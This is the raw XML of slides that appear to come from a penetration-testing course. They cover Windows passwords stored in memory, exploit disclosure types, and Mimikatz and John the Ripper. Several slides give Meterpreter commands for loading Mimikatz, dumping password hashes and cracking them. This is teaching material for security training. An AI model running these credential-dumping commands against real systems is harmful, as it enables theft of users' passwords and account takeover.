        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="633835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Passwords stored in memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Windows also stores passwords in memory which can be dumped easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>When?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Console logins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>RDP logins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>RunAs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Windows Services running as a specific user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Windows API calls for various applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2272713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E687-564A-F24B-B663-79BEC5543BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit Disclosure Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8C2909-B4C4-C440-9365-4AB1ED54E8CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>Public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>Private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>Zero Day (0day)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5857320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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 10.52.47 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-5275" b="-5275"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9807791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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 10.53.58 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-37180" b="-37180"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32678149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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 10.54.13 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-29258" b="-29258"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40983551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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 10.56.16 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-54110" r="-54110"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21150035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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 10.57.28 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-175000" b="-175000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12384845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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-21 at 11.01.18 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2847" b="-2847"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2909948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mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Originally a standalone tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://blog.gentilkiwi.com/mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/gentilkiwi/mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Extracts passwords in plaintext when possible, hashes, Kerberos tickets, pass-the-hash, and Golden tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5652314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B2C51-64EB-8044-A9B5-3E1C9413D361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD46D72-D14F-6044-A7CD-C0882A3C6827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Run through the Metasploit exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Profit!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1813543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John The Ripper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.openwall.com/john/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU-based password cracking tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And sure enough, built into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use auxiliary/analyze/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jtr_crack_fast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That said, if cracking complex passwords or using a large word list run John standalone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save hashes to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>john </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hash.file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="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264573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hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-23 at 3.46.24 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-15937" b="-15937"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198989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B714-F5E5-0B48-AFD5-24888427A17F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Penetration Test?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18096089-DE44-A548-A17F-E95700AC38AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4114288032"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2286000"/>
          <a:ext cx="7620000" cy="2468880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3810000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="160774903"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3810000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3038843296"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Public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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>✅</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2736730539"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Private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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>✅</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="81404759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Zero 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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>🚫</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1122430175"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28942337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3 at 3.50.08 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-15076" b="-15076"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
